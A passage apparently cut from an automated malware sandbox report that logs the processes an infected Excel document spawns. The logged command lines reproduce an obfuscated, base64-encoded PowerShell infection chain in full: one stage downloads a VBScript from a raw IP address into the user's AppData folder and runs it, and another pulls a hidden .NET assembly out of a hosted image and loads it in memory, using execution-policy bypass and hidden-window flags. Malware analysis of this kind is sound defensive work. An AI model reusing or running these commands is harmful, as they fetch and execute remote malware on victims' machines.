jk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS" Jump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD3B4.tmp" "c:\Users\user\AppData\Local\Temp\oojbmfem\CSCF5327E7FE341DA9559637718172BC.TMP"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ